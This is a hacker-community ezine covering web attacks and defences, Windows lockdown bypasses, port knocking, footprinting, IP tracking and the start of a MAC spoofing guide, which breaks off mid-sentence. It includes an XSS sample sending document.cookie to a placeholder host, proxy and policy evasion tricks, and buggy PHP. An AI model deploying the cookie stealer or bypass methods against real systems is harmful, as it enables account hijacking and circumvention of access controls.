LockDown - Hackers Ebook

Page 1
LockDown Contents
Introduction..........................................................4 CSPRNGs and Secure Stream Ciphers...........38
Shout Outs.......................................................5 Block Ciphers.................................................38
Net Based Attacks................................................6 RSA and Friends.............................................40
SQL Injection..................................................6 The Rabin Cryptosystem................................41
RSA in detail..................................................42
Session Hijacking............................................7
Diffie-Hellman Key Exchange.......................43
CSRF................................................................7
The ElGamal Signature Scheme.....................44
Local Attacks......................................................11 OpenSSL........................................................45
Bypassing local admin (Windows)................11 Final Thoughts................................................47
Adding & Modifying Icons on the Desktop....11 Miscellaneous.................................................47
Accessing the Control Panel...........................12 Off-topic.........................................................49
Accessing Web Sites.......................................13Social Engineering.............................................50
Local Security....................................................15 What is Social Engineering?...........................50
Port Knocking................................................15 So its hacking.....?...........................................50
Introduction....................................................15 So its psychology.....?.....................................50
Server-side configuration................................15 Case Study.....................................................51
Client-side scripts...........................................16 Conclusion:.....................................................53
Some bitch-talk...............................................17 Basic Psychology...........................................53
Added note.....................................................17
Security in Communities................................54
Forensics & Enumeration...................................18 Conclusion......................................................55
Beginners Guide to Footprinting...................18SSH Tutorials.....................................................56
Introduction....................................................18 SSH Tunneling Explained.............................56
Ping Sweeps...................................................19
How to Configure SSH..................................59
Port Scanning.................................................19
Port Validation................................................20 Programming Tutorials.......................................63
Operating system Identification......................20 Forth..............................................................63
Network enumeration.....................................21 Creating libraries in C/C++...........................69
Obtaining Network Hardware vendor.............21 Static libraries.................................................69
Beginners Guide to IP Tracking....................22 Shared libraries...............................................73
IP Location & Tracking..................................22 Dynamic Libraries..........................................76
Finding Active connections (Trojan Hunting) 22 dlopen() flags..................................................78
Finding an IP through a chat application........23 Summary........................................................79
IP Tracing.......................................................23 General/Miscellaneous.......................................80
PING..............................................................23 Base Conversion Tutorial..............................80
TRACERT......................................................24 A Brief Introduction to Ipv6..........................84
IP Research.....................................................24 Address Structure...........................................84
Email Headers................................................24 Simplifying of Zeros.......................................84
Conclusion......................................................25 Using the Addresses.......................................86
Dirty MAC Spoofing.....................................27 Comments......................................................86
Why Why Why?.............................................27 A Brief Introduction to IPv6 – Part 2............87
Implementing a spoofed MAC.......................27 Setting up IPv6 in Windows...........................87
Cryptography......................................................29 Setting up IPv6 for Linux...............................87
A little about Cryptography...........................29 SSH & Interfaces(Linux)................................88
Classical Crytography - Stupidity, Substitution, Comments......................................................88
Transposition, Overconfidence.......................29 Changing the Grub Splash Screen.................89
Vigenere Cipher..............................................32US Members Projects.........................................91
Modern Cryptography - Formalizing, Types of USL (Underground Systems Linux)...............91
Attack, Perfect Secrecy...................................33 Closecrypt Encryption System........................91
Mathematically Speaking...............................33 US New Post Perl Script.................................91
Practical Ciphers - Stream Ciphers.................35 Rapid Hacker .................................................92
A Real Stream Cipher.....................................36 Proxy Ripper v1.0...........................................92
Cellular Telephones - A5/1.............................37 USSR..............................................................92
Page 2
Introduction
Welcome to the first edition of LockDown, an ezine released by the community of
UndergroundSystems.org. This collection of tutorials and papers have been written solely by US
(Underground Systems) members and credit will be given where due.
Its finally here, the first proper US Ebook! Ive threatened for so long to get this out before under the
name of 'US Hackers Desk Reference' and due to the amount of support Ive received this time
round I can safely say that lads, this is it. The formatting isn't colorful or decorative but its not
suppose to be. The idea is this entire document is ready for print as soon as you want. Its easily
readable and easily navigable (except Yuips cryptography section... very difficult to categorize all of
it). Maybe we will release a graphical one at some point but I like the concept as it stands here.
Unfortunately due to time constraints t0nedef couldn't edit this entire document... so that technically
means you can expect bad grammar on my part. But I do lay credit to him for trying to contribute
alongside dothacker who also had too much going on in his life to help.
This is a big moment for me and id like to take this time to say thanks to everyone who entered the
US Graphics Competition for the front cover. Firmware won it in the end but all 3 entries were to
say the least, competitive. So well done Firmware, 3 US competitions won... you are the king... but
you still cant do fractals like Narada.
I would like to thank everyone at US for the support of this Ebook. Many people were willing to
offer their articles and there was plenty to go in this issue and in turn have created a concoction of
lessons to pass onto the new guys joining our community. This could be the beginning of a
complete series of ebooks who knows! If it gets any bigger though im going to need help, but
anyways, I would like to thank Kem the US founder for initially creating the community and every
senior member who has helped him keep it in order. This ones for you guys... enjoy!
I still feel we havnt even scraped the surface of what this community can offer. Lets hope if the 2nd
book ever gets here everyone throws in their 2 cents\pence.
So on with the show. Enjoy the book and please leave feedback at UndergroundSystems.org.
- Linx
And now a few words from everyone who contributed to the community and the book...
Page 3
Shout Outs
Give a kid some code and make him h4xX0r for a day.
Teach a kid to program and make him h4xX0r for a lifetime.
- Tux -
Shout Out to Underground Systems for giving me the opportunity and inspiration to share and
distribute knowledge!
- Xiao Tan -
I want to thank the whole US community for helping me to improve and get better as a human
being and as a self respected geek, and I want to give a special thank you to Gnome and
Narada....... ooh shit I forgot ... and t0nedef.
- d4de -
I would like to like to say thanks to BlackJackHker, his own personal Jesus Christ, Narada for
being somebody for him to look up to, and to Neurox/Technofreak for being his mentor for the
past two years. The latter made all of this possible. Only the birds fly first class, people.
- FirmWare -
Nobody's perfect. Hackers prefer to be "nobodys", so that makes us perfect
- Blue Devil -
One cannot learn how to hack. It isn't until you get a full grasp of this concept, that you can call
yourself a true hacker.
- BlackJack -
Page 4
Net Based Attacks
SQL Injection
Author: Aaron
There is a great tutorial on SQL injection elsewhere. If you are unsure of what it is, read the article
on Rest0re.
Now, protection from SQL injection. This will be demonstrated in PHP, mainly because PHP is the
most commonly known language, and I don't know plain ASP.
Your code can look like
PHP Code:
$_GET['id] = $id;
$query = mysql_query("DELETE * FROM ùser` WHERE ìd`=$id");
Now, some of the devious minds might want to have you select a different user, or SQL inject you,
and that is bad. One way I like to protect from this is to use sprintf().
Sprintf will make sure that your code is valid before entering it into the query.
PHP Code:
$id = '5 OR id != 0';
$szSQL = sprintf(" DELETE FROM

myTable
WHERE
id = %d",
$id,mysql_real_escape_string($IfTherWasAStringVerifyOnIt'sOwnLine));
And your entire user table was just saved.
How does this work? Sprintf works like printf in C, or strings in C#, but it validates the data.
Code:
// This is a console string in C#
//System.Console.WriteLine("My {0} itches.","computer");
So, it just substitutes any string after the initial string into the original string like an array.
Take another look at Sprintf() above. It does the same exact thing, except with %d. %d is a
numerical identifier. If %d isn't numerical it will MAKE it numerical... Okay, it prevents deletion of
everything in your table, but not a single row. that single row could be you! Sprintf()'s power is in
cleaning up your code. However, sometimes you need additional help.
Page 5
PHP Code:
try {
if (ctype_alpha($_GET['id']){
throw new exception("Epic Phail. Your ID isn't a string.")
}
}
catch (exception $e){
echo $e->getMessage();
}
and there you have it. If you did that for everything, you would have a MESSY code block. That's
why I like sprintf.
Session Hijacking
I give you a link to some site on AIM and mask the link:
<a href="www.example.com?SESSID=666>Hot Nude Pictures</a> (okay, my spam filter isn't
perfect GHASP, I just gave you a link to a site you were logged into. GHASP, I follow the link
andddd.... I gotz your session now. (I actually made this work too ) Oh wait! Look! It's a bird! It's a
plane! It's session_regenerate_id() coming to save the day!
A session is terminated once a user leaves a site. Sites use 'remember me' cookies to keep some
unique identifier of the user. It could be the users ID. If it isn't hashed, you should just stop
developing.
The PHP gets the unique cookie if it exists. It sends a query to the database and generates the
session with all the information that it needs. BUUUT the session id will be what was thrown into
the $_GET identifier. You can unregister globals, but that is Wayyyy outside the scope of this post.
When the session is generated, the Session ID should be regenerated. That way, you cannot hijack a
session. However, you can go a step further. Store the user agent and the IP of the user in the
session, and check it to what they offer. If their IP changes, or if their browser changes (we can't
rely just on browsers anymore, everyone is using firefox ), terminate the session and any 'remember
me' cookies.
CSRF
Here is a quick summary of CSRF:
Maz wants to deviously make someone buy something on some e-commerce site. He reads through
some stuff on how browsers process and request pages. He learns that browsers make you send a
request to a page in src attributes.
Let me further explain. When you get the logo in this site, your browser makes a request to
http://www.undergroundsystems.org/fo...gbannernew.jpg. The aforementioned page gives its
contents (an image) to the page requesting it.
This means Maz's devious URL would be in an image, with the src of the devious site. Now, the
devious site would need to use $_GET (or worse... $_REQUEST...), because POST CSRF is
extremely hard to pull off, and would take much longer to explain.
Page 6
The trick of this was explained, but I glossed over the deciding factor: the user needs to be logged
in.
Solution
Session variables should always carry a unique identifier. A random token. Anything. Because I am
so nice, I'll release my password generator (I actually use this for my password on web sites and
stuff! )
PHP Code:
<?php
// Create a random string and echo it out.
$szLength = 50;
$szString = '';
// Different security levels
$lvl[0] = 'abcdefghijklmnopqrstuvwxyz';
$lvl[1] = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$lvl[2] = '1234567890';
// Heredoc just makes life easier

$lvl[3] =<<<EOF
`~!@#$%^&*()_+-=[]{}|;':",./<>?\'
EOF;
// 100 Fun Characters

$lvl[4] =<<<EOF
°÷ú?²¶¼?ÅïÌ¡ç¬?¿í¤¸äÏ´óÍ³ÚÊâüãæËÁ½ÇÀÎ
¢×¨ÒîÈñ¯Ñù¦ëý§ûÖÞÛ¹ÃÄÝªèéõåÓ~ØÙðÆ¥á»öÜ£ò*«º?¾Õ·®µ±Â?ôìþêÉøÐÔßà
EOF;
for ($c = 0; $c <= $szLength; $c++){ // har har, c++
// Choose a Level
$level = rand(0,4);
// Perform three checks to further randomize string

if ($level == $lastLevel)
$level = rand(0,4);
$level = rand(0,4);
$level = rand(0,4);
$randChar = substr($lvl[$level], rand(0, strlen($lvl[$level])-1), 1);

$szString .= $randChar;
$lastLevel = $level;
Page 7
if ($szString == "")
echo "WTF!!";
}
echo $szString;
?>
Using a 50 character token is a little much. So are my 100 Fun Characters (that's my line, noone
take it.) Just use 10 characters.
When you display a form, give it a hidden field with the users token. The site would be extremely
hard pressed to get the random token. If you randomize the number of characters (change $szLength
to rand(10,50), it would have less than a 1% chance to get it correct.
On the PHP script, check everything. You can go even further, but that's not necessary.
If you want to prevent $_POST CSRF, you need to follow the above. It works for everything. If you
want to protect yourself from CSRF, form spoofs, or XSS, unique tokens pwn.
Code Injection
Code injection is more or less the same thing as XSS.
It's a pain to explain, so I will just put up an example.
For this example to work, VBulletin has to be security trashed.

Some evil person on this board wants to steal peoples cookies. (web cookies)
He deviously makes a topic on this site in the Introduction area like the following:
Code:
HAI! LOL TEECH Meh TO H4XX PL0X!! I WANTZ TO BE KOOL n H4X HOTMAIL!!11[one]!
PL0X L()L I Hve (insert skiddie tool here)

<script>
document.location = ’’http://example.org/getcookies.php?cookies=’’
+ document.cookie;
</script>
This has got to be the most easy to pull off trick in the book. When people sanitize a query, they
normally do something such as the following:
PHP Code:
$query = mysql_real_escape_string($query)
That only protects your DATABASE. It does not protect your users. I <3 my users, unlike you other
bastards >.> (Microsoft)
Protecting your users:
PHP Code:
htmlentities($anyOutputWhatsoeverUnlessIfItHasAttributes)
Page 8
Finished... I kinda jumped around on this, so if there is something I kinda didn't finish, it would be
great if you told me
Page 9
Local Attacks
Bypassing local admin (Windows)
Author: Linx
Many times we have logged onto a computer where we are locked down beyond belief. We cant
even right click the desktop, access to the run menu is unavailable, access to the floppy drive is
disabled and many others. Heres all the tricks (the ones i remember) that I have used now and in the
past to get what I need from a restricted system.
Adding & Modifying Icons on the Desktop
Sometimes we need to access things that are installed but not accessible for some other reason. For
arguments sake, you know Internet Explorer is installed however you cannot access the folder in
which it is stored.
A few tricks for this one.
To create an icon… try the following
Right click>create icon (im stating this as it may not work)

Go into the start menu and drag a random application onto the desktop
Now we need to modify the icon so try this. If right click is disabled highlight the icon and press Alt
+ Enter to bring up the properties bar. Bring up the target bar and redirect it to the application of
your choice (i.e. c:\windows\system32\cmd.exe)
Also I discovered this on my travels, I believe it was distributed (and possibly created by) Wang.
Wang, last time I remember hearing about him, was a leader in the Red Brigade of the
Cyberarmy.net, visit them sometime.
Fill in the correct information and this script will create a desktop shortcut icon…
Code:
Dim WSHShell, MyShortcut, MyDesktop, DesktopPath, FileSys
set FileSys = CreateObject ("scripting.FileSystemObject")
Set WSHShell = Wscript.CreateObject("WScript.Shell")
DesktopPath = WSHShell.SpecialFolders("Desktop")
Set MyShortcut = WSHShell.CreateShortcut(DesktopPath & "\mylink.lnk")
MyShortcut.TargetPath = "the full path to the target file"
MyShortcut.WorkingDirectory = "the working directory for the file, i.e. the path to the folder it is
in"
Page 10
MyShortcut.WindowStyle = 4
MyShortcut.IconLocation = "the full path to the target file"
MyShortcut.Save
MsgBox "Done", vbinformation, "Done"
You could even try exploiting the autorun CD function (although im not sure if it works in
screensaver mode on XP). This is set to enable by default on all Windows packages as far as im
aware. If you developed a script to create many shortcuts on your desktop you could just run it
anywhere you wanted by sticking a CD in the drive. Maybe create multiple icons pointing to cpl
extensions and apps you will need to fullfill your bidding, maybe even also run an admin script.
Accessing the Control Panel...

In some systems the control panel can become unavailable. The control panel works by having files
with *.cpl extensions hidden within the system32 folder. You can locate these in the one of the
following addresses
Code:
c:\windows\system32
c:\winnt\system32
These files can be double clicked like any normal app and will load like any normal application.
The following is a translation of what all the files will open...
+ Access.cpl - Accessibility options

+ Appwiz.cpl – Add/Remove Programs
+ Desk.cpl – Display Properties
+ Hdwwiz.cpl – Add Hardware Wizard
+ igfxcpl.cpl – Intel Graphics Controller (You may not have this one)
+ inetcpl.cpl – Internet Properties
+ intl.cpl – Regional & Language Options
+ joy.cpl – Game Controllers
+ main.cpl – Mouse Properties
+ mmsys.cpl – Sounds & Audio Devices
+ nusrmgr.cpl – New User Accounts
+ odbccp32.cpl – ODBC Data Source Administrator
+ powercfg.cpl – Power Configurations
+ prefscpl.cpl - Preferences
+ sysdm.cpl – System Properties
+ telephon.cpl – Location Information (dial up)
+ timedate.cpl – Time & Date
Page 11
+ wuaucpl.cpl – Automatic Updates
OK that’s all of the cpl files on my system now. There’s one other alternative if you do not have
access to the explorer menu.
Open up a “Help” box on the desktop. Either click start -> Help & Support, or click the desktop in
an open space and press F1. Run a search for “Add/Remove”. This will bring up an article on how
to add and remove apps. It will also display a link to the Appwiz.cpl.
Accessing Web Sites...

So many different ways around this one… I will number them…
1. Try creating a redirect at http://www.cjb.net

2. Convert the hostname to an IP (Numerous converters available out there)
3. If the IP fails try configuring explorer to use another proxy.
4. Try converting the IP to a “DIP” (Defunct Internet Protocol). Tutorial for this is below, thanks to
Wang for this one.
Quote:
Wangs Haq Faq Vol.5
Optiklenz from "Legions Of the Underground" has a method called the ' Defunct IP Protocol'
which may just work:
If you take an IP in standard form, and convert it to a defunct IP (this is how optiklenz refers to it)
the defunct IP will still work just like the normal IP, but because it has no decimals separating
segments it is perceived as an Intranet host rather than an IP - and Intranet hosts usually have very
little security precautions assigned to them.
Here is optiklenz's description of how a defunct IP is created form a standard IP:
Seeing that IP's are 32 bits in 4 8bit segments. If you take 32 (bits of the ip) and multiply it by
8(bits of each ip segment) you get 256 bits or a cluster of 1's, and 0's depending on how you are
looking at it. =]
The give an example of how we go from an IP in decimal form to a defunct ip. We'll use
www.legions.org. Resolve the domain name. In this case we have 199.227.88.145:
[segments referred to as SEG]
********************
256| 3-2-1 method...
********************
32(8) = 256
|_SEG1(199)*256^3
|
Page 12
SEG2(227)*256^2_+
|
SEG3(88)*256_+
|
SEG4(145)_+
|
145_+ -= 3353565329 (new identifier)
Defunct IP: The reason I call the new identifier a defunct IP is because when it goes through the
above process it is no longer decimal form. So I refer to it as a "dead ip"
Now, this defunct IP is no longer really an IP and therefore any security implementations that occur
for an IP address are no longer present. So, to answer the question above, If you have access to a
computer where internet sites are blocked behind a proxy, you can use the defunct IP so that the
security measures no longer apply.
E.G.
www.legions.org >> Blocked by Proxy
199.227.88.145 (IP of www.legions.org) >> Blocked by Proxy
3353565329 (Defunct IP for www.legions.org) >> Allowed
That concludes this basic tutorial.
Page 13
Local Security
Port Knocking
Author: Tux
I've just managed to set up port knocking on one of my servers using only iptables and basic
scripting to help me. I though i'd share how i did.
Introduction
You will need a working *NIX environment with iptables installed. And of course a port you want
to hide. In words the process of doing this can be described as following:
1. Connect to a predefined sequence of closed ports. Each of these connections will get logged.
2. When the firewall have detected that a "knocking" have been completed it opens the port,
but only for 5 seconds.
3. The client connects and port closes. But your connection will be alive because we configure
the firewall to let through established connections.
This technique will not work for a web server or some other protocol where the connection isn't
kept alive but closed until a new request is made.
Server-side configuration
Begin by creating a new file called temp.sh in some folder you have access to.
Then put this in it:
Code:
/sbin/iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
/sbin/iptables -A INPUT -m state --state RELATED -j ACCEPT
/sbin/iptables -N INTO-PHASE2
/sbin/iptables -A INTO-PHASE2 -m recent --name PHASE1 --remove
/sbin/iptables -A INTO-PHASE2 -m recent --name PHASE2 --set
/sbin/iptables -A INTO-PHASE2 -j LOG --log-prefix "INTO PHASE2: "
Page 14
/sbin/iptables -A INPUT -m recent --update --name PHASE1
/sbin/iptables -A INPUT -p tcp --dport 111 -m recent --set --name PHASE1

/sbin/iptables -A INPUT -p tcp --dport 222 -m recent --rcheck --name PHASE1 -j INTO-PHASE2
/sbin/iptables -I INPUT -p tcp --dport 22 -m recent --rcheck --seconds 5 --name PHASE4 -j

ACCEPT
/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
The first block is for allowing already established connections to pass through the firewall. The next
four is the lines that check the firewall logs after the port sequence. The lines after those defines the
secret sequence and should be changed to something only you know. The 111, 222, 333 and 444 is
the port numbers that you need to connect to in this order.
The line after that is what will happen on a successful "knocking". The 22 is the port to be opened
and the 5 is the amount of seconds i should be open. Don't worry about it only being 5 seconds,
that's enough for an application to start a connection and once that's done you're past the firewall.
The very last line is for making the port (in this case 22) being closed as default or else this whole
thing is pointless.
After this is done, type the following commands to activate this configuration and save it as the
default together with your other firewall rules.
Code:
chmod +x temp.sh
./temp.sh
iptables-save > /etc/iptables.up.rules
That was server-side. No on to the client.
Client-side scripts
I'm assuming that your client is also a UNIX one. You have lots of ways to connect but i'll just be
showing two here:
Code:
netcat -z <hostname/ip of server> port1 port2 port3 port4; ssh user@host
eg: netcat -z example.org 111 222 333 444; ssh root@example.org
You can also create a shell script called /bin/pk with this content:
Page 15
Code:
for PORT in 111 222 333 444; do \
nmap -P0 -sT -p$PORT --host_timeout 1501 $1; \
done; \
ssh $2@$1
Make it executable with 'chmod +x /bin/pk' and the run it like this:
Code:
pk hostname/ip user
eg: pk example.org root
Now we have a working port-knocking configuration.
Some bitch-talk
This tutorial isn't really mine to 100%, I've based mine on this page (http://www.debian-
administration.org/articles/268).
Also note that this is only tested on debian. Both my server and client is running debian 4.0. But it
should work almost everywhere. You windows guys will have to find your own way to knock ports.
Maybe the win32 client found here can help you (http://www.zeroflux.org/cgi-
bin/cvstrac.cgi/knock/wiki).
I know this can be done very easy with knockd (tut here (http://gentoo-
wiki.com/HOWTO_Port_Knocking)) and shimmerd (http://shimmer.sourceforge.net/) but i didn't
feel like having another service running that eats resources when i could do it with thing built into
my kernel.
Added note...
After lots of time trying figure out how the fuck Visual C++ 2008 works i managed to compile a
knocking client for windows. You can find it here (http://tux.h4xx.se/files/knock.exe).
Works as following:
Code:
knock.exe <host/ip> port1 port2 port3 port4 ......
eg: knock.exe example.com 111 222 333 444
The source for knock.exe can be found here (http://www.zeroflux.org/proj/knock/files/knock-

win32.zip).
Page 16
Forensics & Enumeration
Beginners Guide to Footprinting
Author: Linx
Introduction
Footprinting is the art of obtaining information on an computer and/or infrastructure using a variety
of security tricks and tools. It is a form of recon that will allow you to "legally" gather information
on a target system such as OS types, Server roles, network hardware manufacturers, key contacts,
support details and much more.
We will discuss the following in this article:
+ Ping Sweeps
+ Port Scanning
+ Port Validation
+ OS Identification
+ Hardware Identification
Topics which ideally should be included in this tutorial as they are in the remit of finger printing,
but are not due to my inability to create enthusiasm whilst writing are:
+ DNS queries
+ Social Engineering
+ Visual Network Mapping
The list goes on, but this should keep you going for a little while longer after reading through this
tutorial.
In short it will be a scope on your target so you will, in theory, be able to pin point any possible
bottlenecks and also equipment that is vulnerable to DoS attacks and other vulnerabilities or bugs.
For the purpose of simplicity some of the examples used within this article assume that are on
already on a LAN and are internally scoping the network.
Page 17
Ping Sweeps
Ping sweeps do exactly what they say on the tin. The sweep a range of IP addresses determined by
the end user input and ping every IP address in that range and report if network connectivity is
available on the target machine.
There used to be days when you could simply go nuts and not worry about a thing but now there are
security restrictions in place. Perl scripts running on network servers to check for excesive ICMP
activity and lock it down and servers now being configured to not respond at all to ping requests.
The tool everyone seems to use recently is the infamous NMAP. This comes in the forms of
command line and GUI. NMAP can be set to scan in various modes, too many to mention, but the
plus factor is that you can alter the "Stealth Factor" alongside other functions to aid in bypassing
firewalls and other forms of IDS (Intrusion Detection Systems).
Port Scanning
Ports on a PC come in 2 forms, software and hardware. Hardware ports are on the rear of your PC,
they are serial ports, com ports, USB ports and so on. On the other hand you have software ports.
These are not visible but essentially control openings to your PC. They are the equivelant of
windows and doors on your house.
You can have them open, or closed. When they are open, you can get in, when they are closed, you
cannot.
For example, port number 80 is open to allow HTTP (Hyper Text Transfer Protocol) packets to go
in and out of the PC. If for some reason you wished to halt access to the internet using a firewall,
you could simply just block port 80 to disallow all HTTP traffic.
There are many ports (65535 to be precise) and they are categorized into Registered and
Unregistered. Should you wish to obtain a port list and information on categorization go to the wiki
here (http://en.wikipedia.org/wiki/List_of...P_port_numbers).
Now moving back on track port scanning will allow us to check, remotely, all ports on a target
machine and see if they are open.
Lets say port number 23 was displaying as open, this would mean that the users telnet port is open
and possibly vulnerable to attack. Now this might seem fairly logical but theres several things you
need to take into consideration...
Ports like 23, 80, 8080 and such like are "common ports" meaning that they are in use on a fair few
machines. When you get to lesser known protocols and applications the protocols can be changed
by the end user giving the wrong information to you... a perfect example is something like Sub7.
Page 18
Sub7 by default runs off of port 27374. So due to most people not knowing about modifying the
port preference, many Sub7 Trojans stay that way, hence 27374 is usually referred to as "Sub7's
port". The catch is when someone changes that port to something else... lets say 500, now when you
perform a port scan and you see port 500 open, you wont see it as Sub7, you will look through your
port list and see (looks through port list.....) "ISAKMP, IKE-Internet Key Exchange" which is not
Sub7.
So to sum up, port scanning can give you a basic grounding as to the services and applications
running on a machine however they cannot be taken as gospel.
Port Validation
As stated in the last paragraph you can never be sure if the port scanned matches the one in the list
as the end user can change the port preference on many applications. To check this out we use a
technique I call "Port Identification" (it may have a professional name, but i haven't heard it).
As we all know applications host themselves on ports, most commonly to gain access to the
network/Internet to send/receive data. This usually means that the application will respond if certain
data packets are sent to it. Lets use another analogy...
Port 1 - English speaking port

Port 2 - Spanish speaking port
Port 3 - Italian speaking port
Port 4 - German speaking port
Ok, so we've got ports that will respond to their own languages. But what happens if the German
and Italian switch places? Well according to our list Italian is in 3 and German is in 4, whereas, in
reality its vice versa.
So when we port scan we see that port 3 is open... so as far as we are aware we are looking at the
Italian port... lets check this... we send some test data "Salve"... we get no response. We now know
that the port is in fact NOT Italian... we try with more test data "Hello", no response, "Buenas
Dias", no response, "Guten tag" and get a response.
Long winded but heres the real world scenario, after youve performed you port scan and identified
that the port for VNC (Virtual Network Computing) is open, how can you confirm its VNC? You
open up your VNC client and attempt to connect to it, youll get 2 responses, it will either ask you
for a password and/or let you in if one is not set OR it will say "Cannot connect to client".
Operating system Identification

To determine the OS (Operating System) of a target IP we can use NMAP. Use the following
Page 19
command line:
Code:
nmap -O 192.168.1.1
I think the above is right but I haven't tested it yet. This will basically finger print the OS of the
target set... thats it really.
Network enumeration
After you've performed trace routes to some target machines you will be able to ascertain where
some of the network hardware is and also who its made by, maybe even get a model number.
The aim of this is to test for currently know faults with router hardware. There are many known
Cisco vulnerabilities for example, which can be utilized to further you information gathering from
this technique.
Obtaining Network Hardware vendor

OK so you have an IP and for some reason want to know the hardware vendor of the network
interface being used. For this we can use a variety of methods, i will discuss 2 from Windows
boxes...
Should you have the fortunate luck to obtain the local admin password from somewhere you can
use the "getmac" command. For more information type:
Code:
getmac /?
However for those of us who are scanning the network without the aid of administrator passwords
we will use our ARP cache. Simply ping the machine, then straight after in command prompt type
"arp -A" you will then see the IP address of the target machine and right by the side of it is the
MAC address.
Now once you have the MAC you might want to know the vendor. To do this go to
http://www.coffer.com/mac_find/ and follow the on screen instructions. Job done.
That sums this tutorial up... im leaving this job now and this was an old text file I was working on
so its kind of incomplete. Have fun, shouts to all who critic peoples work, it gears them all on...
FREE TIBET
Page 20
Beginners Guide to IP Tracking
Author: Linx
There was a revived post today so I thought seeming though im doing absolute sweet FA at work, id
write a tutorial on IP tracking. Any questions please post.
IP Location & Tracking

IP tracking is a fairly complex topic but to understand the basics requires little brain space to
remember. What il discuss in this tutorial is how to get an IP using several methods, and also how to
trace it back to its origin.
On top of this we will also discuss practical applications of the commands and tricks used as they
would apply in a real world scenario.
Moving onto the first chapter....
Finding Active connections (Trojan Hunting)

You may feel that an application and/or unauthenticated user is logged onto your machine remotely.
This is a relatively basic way of identifying intruders on a Windows box.
Open up a command prompt window (Start>Run>"cmd").
Type "netstat -ano". This will display all active connections with ports and the associated
PID(Process Identification) reference.
OK, now we open up the task manager (Ctrl+Alt+Del) and go to the "Processes" tab.
Click "View" then "Select Columns" and make sure that the "PID" box is checked. Click ok.
Now this will display the associated PID to the application.
Going back to the command prompt window I want you to take a random process and find its PID
number in the table. When you have it run it against the list in the task manager and this will give
you the corresponding application using this connection.
This method will be ideal to ascertain if certain applications that you are unaware of are actually
Trojans of some sort.
Page 21
Finding an IP through a chat application
Everyone asks this so now il explain for good. Most chat applications run from a server. Chat
messages are relayed from the end user to the server and then to the recipient. Because of this
THEIR IP WILL NEVER BE REVEALED! The only way you will be able to obtain their IP
through a chat program is to open a direct connection with them. This would be via a webcam or
file transfer.
Once a file transfer/webcam has been initialized a direct connection between you and the recipient
is opened. This is when you will be able to track them.
Before the file transfer open up a command prompt windows (Start>Run>"cmd")
Type "netstat -an" this will provide all active connections and port references
Now start the file transfer
Type "netstat -an" again and the list should be different... guess what.... its their IP
So thats how you can do it, no more questions.
IP Tracing
Now for the fun part. You have your IP and you want to know who they are and where they are.
This is really simple and il explain in the following chapter.
PING
In the command prompt the "ping" command sends an ICMP echo request to the destination and in
response the destination will send a packet back. This will then be reported on screen with
connection speeds, TTL and maybe a hostname if your lucky amongst other useful information.
Code:
Syntax:
ping <hostname>
ping <IP>
In a real world scenario this is used to check network connectivity to users on a network. This
would also alert you to connectivity issues (gamers refer to this as lag or maybe a lag spike). As a
rule of thumb if your ping response times go over 35ms on a LAN theres issues, but saying that
please don't forget that if your pinging a machine on the other side of the world, evidently it will
Page 22
show in the response time.
TRACERT
Trace route is an exceptionally useful command line utility, it checks every networks points
connectivity on route to the destination. Essentially it checks response time and gives you the IP of
every bit of hardware it passes through on route.
Code:
Syntax:
tracert <hostname>
tracert <IP>
In a real world scenario this can be used in conjunction with the ping command to verify any issues
with connectivity. Chances are that if multiple users are affected by a network issue of some sort (be
it just slow or a complete outage) tracert will show you where the bottleneck/issue is on the way.
IP Research
Once you have the IP addresses from the hacker/violater/spammer/noob we can then do some
research on the IP. We do this many different ways and most *nix users will be competent in using
the whois command. Unfortunately Winblows does not offer the whois command. There is an
alternative command but il show you other ways instead.
If you go to http://www.samspade.org you will find yourself at an online whois lookup site. There
are many out there but I've always used this.
If you type the IP address in and perform the lookup it will reveal a wealth of information about the
target. This will include geographical locations, support contact numbers, registered owners and
more.
In the real world this could be used to track spam mails to phony sites, it can also be heavily utilized
by social engineers in order to increase their information on a target with helpdesk numbers and
office names.
There are alternative sites with nice pictures for the more aesthetically minded people. The best one
I've found is http://whatismyipaddress.com. This will provide a nice little map for you but
essentially it will do the same job as Sam Spade.
Email Headers
Ive left this till last because its kind of a different topic but the essence of what im trying to teach is
still here. Were going to discuss how to track your email back to its sender.
Page 23
I'm going to use Outlook as an example of how to obtain headers, it may differ with other
applications.
Within Outlook (2003) open up the mail by double clicking it.
Click "View" then "Options" in the menu bar.
The headers are in the box at the bottom of the dialog box.
Looking at these and understanding them is a tutorial on its own so im going to give you a crash
course...
Firstly this box is tiny so select all the text and copy it into notepad (I don't use anything else). You
see on the left hand side you have "Received:"? This is essentially like a hop when using trace
route. It displays the mail servers this email went through to get to you. There may be multiple hops
especially if your within a company network with a larger mail infrastructure.
Find the last "Received:" tag.
Code:
Received: from COMPUTER10 ([84.16.136.123])
by mailhost2.some.company.com (8.13.6/8.13.6) with SMTP id m2JDmFcM003526;
Tue, 19 Feb 2008 12:48:55 GMT
Date: Tue, 19 Feb 2008 15:41:49 +0300
From: "La Scala Casino" <pompeii@alacarta.com>
Message-ID: <61807275.13400715@coffeecup.com>
Ok ive modified my mail servers for obvious reasons but the spammer remains the same. This was a
genuine email I received today. As you can see the email originally came from COMPUTER10 (IP
address of 84.16.136.123) and was sent to our corporate mail server.
By running the above diagnostics displayed in this tutorial you will find that this server is in Russia
(Moscow to be precise). You have the sys admins details including contact numbers office locations
etc etc..... a social engineers favorite thing, names and numbers.
Conclusion
This is a basic insight into tracking and it gets alot more involved. Theres literally thousands of
methods, its a case of trial and error. Apologies for spelling errors, I did this in notepad and not
Word/Wordpad. Have fun, peace out.
Page 24
Page 25
Dirty MAC Spoofing
Author: Linx
Hey guys, Ive known this for a while yet I just realized Ive never posted it! Damn me for not
sharing. Well... im bored... again.... its my lunch break... and i have no cigarettes left... so here we
go.
Welcome to the short tip (possibly one of many) to aid all you security conscious engineers out
there. Today boys and girls we are going to discuss MAC spoofing from the view of a Windows
user.
Now, MAC spoofing is the art of... well... spoofing your MAC address. Your MAC address if 12
alpha numeric digits long and identifies your network hardware (your Network Interface Card).
It is usually displayed as something like "12:34:56:AB:CD:EF"
The first 6 digits identify the hardware vendor, and the last 6 are a serial registered to that piece of
specific equipment.
Why Why Why?

"But why would I want to lie about that?" i hear you cry!!!
On most routers these days the option for MAC filtering can be enabled. This will entitle the end
user to advise the router exactly what individual computers and external hardware (i.e. Xbox's,
PS3's, PSP, palms, laptops etc) can use the local network.
This will in a sense block all LAN traffic from sets that are not on the MAC filtered list.
So if we actually have a MAC of someone on the network we can pose as them. Our hostname may
